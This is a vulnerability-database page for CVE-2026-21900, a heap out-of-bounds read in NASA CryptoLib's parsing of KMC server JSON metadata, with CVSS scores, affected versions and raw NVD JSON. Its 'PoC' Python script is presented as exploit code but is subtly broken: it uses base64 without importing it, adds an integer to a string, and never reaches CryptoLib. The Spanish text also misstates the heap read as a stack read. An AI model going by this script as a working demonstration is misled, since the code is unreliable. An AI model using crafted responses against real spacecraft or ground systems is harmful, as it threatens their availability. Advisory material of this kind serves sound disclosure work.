Security Vulnerability Report
中文
CVE-2026-21900 CVSS 5.9 MEDIUM

CVE-2026-21900

Published: 2026-01-10 01:16:18
Last Modified: 2026-01-16 16:46:48
Source: [email protected]

Description

CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, an out-of-bounds heap read vulnerability in cryptography_encrypt() occurs when parsing JSON metadata from KMC server responses. The flawed strtok iteration pattern uses ptr + strlen(ptr) + 1 which reads one byte past allocated buffer boundaries when processing short or malformed metadata strings. This issue has been patched in version 1.4.3.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:nasa:cryptolib:*:*:*:*:*:*:*:* - VULNERABLE
NASA CryptoLib < 1.4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import json import struct # CVE-2026-21900 PoC - Simulated KMC Server Response # This PoC demonstrates the malformed JSON metadata that triggers # the out-of-bounds read in CryptoLib's cryptography_encrypt() def generate_malicious_kmc_response(): """ Generate a malicious KMC server response that triggers the heap out-of-bounds read in CryptoLib. The vulnerability occurs when parsing JSON metadata with short strings that cause strtok iteration to read past the allocated buffer boundary. """ # Malformed metadata with short strings # This triggers the vulnerable code path in cryptography_encrypt() malicious_metadata = { "key_id": "A", # Short string - triggers OOB read "session_id": "B", # Short string "algorithm": "C", # Short string "iv": "D", # Single character "auth_tag": "E" } # Craft the KMC response that CryptoLib will parse kmc_response = { "status": "success", "metadata": malicious_metadata, "encrypted_key": base64.b64encode(b'\x00' * 32).decode() } return json.dumps(kmc_response) def demonstrate_vulnerability(): """ Demonstration of the vulnerable strtok pattern: Original vulnerable code pattern: char *ptr = buffer; while ((token = strtok(ptr, delimiter)) != NULL) { process_token(token); ptr = NULL; // For subsequent calls // Vulnerable: when processing short strings, // ptr + strlen(ptr) + 1 can exceed buffer bounds } """ # Simulate the vulnerable iteration pattern metadata_str = 'A\0B\0C\0' # Short null-terminated strings # This demonstrates how short strings lead to OOB read ptr = metadata_str while ptr and ptr[0] != '\0': token_length = len(ptr.split('\0')[0]) # Vulnerable calculation: ptr + strlen(ptr) + 1 next_ptr = ptr + token_length + 1 # In real scenario, next_ptr may point past allocated buffer print(f"Token: {ptr[:token_length]}, Next ptr offset: {token_length + 1}") break # Single iteration for demonstration if __name__ == "__main__": print("CVE-2026-21900 PoC - NASA CryptoLib Heap OOB Read") print("=" * 50) response = generate_malicious_kmc_response() print(f"Malicious KMC Response: {response}") demonstrate_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21900", "sourceIdentifier": "[email protected]", "published": "2026-01-10T01:16:18.263", "lastModified": "2026-01-16T16:46:47.517", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, an out-of-bounds heap read vulnerability in cryptography_encrypt() occurs when parsing JSON metadata from KMC server responses. The flawed strtok iteration pattern uses ptr + strlen(ptr) + 1 which reads one byte past allocated buffer boundaries when processing short or malformed metadata strings. This issue has been patched in version 1.4.3."}, {"lang": "es", "value": "CryptoLib proporciona una solución únicamente de software utilizando el Protocolo de Seguridad de Enlace de Datos Espaciales CCSDS - Procedimientos Extendidos (SDLS-EP) para asegurar las comunicaciones entre una nave espacial que ejecuta el Sistema de Vuelo central (cFS) y una estación terrestre. Antes de la versión 1.4.3, una vulnerabilidad de lectura de pila fuera de límites en cryptography_encrypt() ocurre al analizar metadatos JSON de las respuestas del servidor KMC. El patrón de iteración defectuoso de strtok utiliza ptr + strlen(ptr) + 1, que lee un byte más allá de los límites del búfer asignado al procesar cadenas de metadatos cortas o malformadas. Este problema ha sido parcheado en la versión 1.4.3."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nasa:cryptolib:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.3", "matchCriteriaId": "AE1BE91E-2901-42AF-BC66-762CFA7A2582"}]}]}], "references": [{"url": "https://github.com/nasa/CryptoLib/commit/2372efd3da1ccb226b4297222e25f41ecc84821d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nasa/CryptoLib/releases/tag/v1.4.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/nasa/CryptoLib/security/advisories/GHSA-4g6v-36fv-qcvw", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/nasa/CryptoLib/security/advisories/GHSA-4g6v-36fv-qcvw", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.